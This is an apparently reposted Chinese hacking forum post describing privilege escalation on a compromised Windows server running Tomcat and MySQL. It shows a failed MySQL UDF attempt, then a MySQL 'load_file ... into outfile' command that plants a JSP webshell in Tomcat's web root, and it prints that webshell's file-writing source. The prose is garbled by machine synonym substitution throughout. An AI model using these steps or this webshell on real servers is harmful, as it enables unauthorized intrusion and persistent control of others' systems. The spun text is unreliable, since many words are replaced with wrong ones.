旧日碰到了这么个问题,简单记录一下我的管理筹算。
起首说一下处事器的状况。处事器的80端口按照尺度的虚构主机来配置的,反对asp,aspx,php,可是不反对php
放置了mssql(1433端口),tomcat(8080端口),serv-u(43958端口)和两个mysql(3306端口和3307端口)
提权的时辰没有sa暗码,没有serv-u暗码,mysql 5.1起首运行了
1 | show variables like '%plugin%'; |
后,依照设置导出dll到C:\Program Files\MySQL\MySQL Server 5.1\lib\溃烂
成立自定义函数似乎被拦挡,不绝腐败。
后找到tomcat目录,准备写马,asp,aspx,php对tomcat目录:C:/Program Files/cngradms_x86/tomcat/网站apps/ROOT/均无写入权限
测试mysql有写入权限。故上传jsp大马至网站网站目录:d:\xxx\fuck.jsp
用mysql实行语句:
12 | select load_file('d:\\xxx\\fuck.jsp') into outfile 'C:\\Program Files\\cngradms_x86\\tomcat\\网站apps\\ROOT\\upload\\fuck.jsp'复制代码 |
后溃烂。
可是访问后获得如下提示:
12345678910 | <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="java.io.File"/><jsp:directive.page import="java.io.OutputStream"/><jsp:directive.page import="java.io.FileOutputStream"/><% int i=0;String method=request.getParameter("act");if(method!=null&&method.equals("yoco")){String url=request.getParameter("url");String text=request.getParameter("smart");File f=new File(url);if(f.exists()){f.delete();}try{OutputStream o=new FileOutputStream(f);o.write(text.getBytes());o.close();}catch(Exception e){i++;%>error<%}}if(i==0){%>ok<%}%><form action='?act=yoco' method='post'><input size="100" value="<%=application.getRealPath("/") %>" name="url"><br><textarea rows="20" cols="80" name="smart"> |
link:http://bbs.blackbap.org/thread-3623-1-1.html
作者:YoCo Smart 【Silic Group Hacker Army】 本文由网络平安攻防研究室(www.91ri.org)动静平安小组征集整理,转载请注明来由。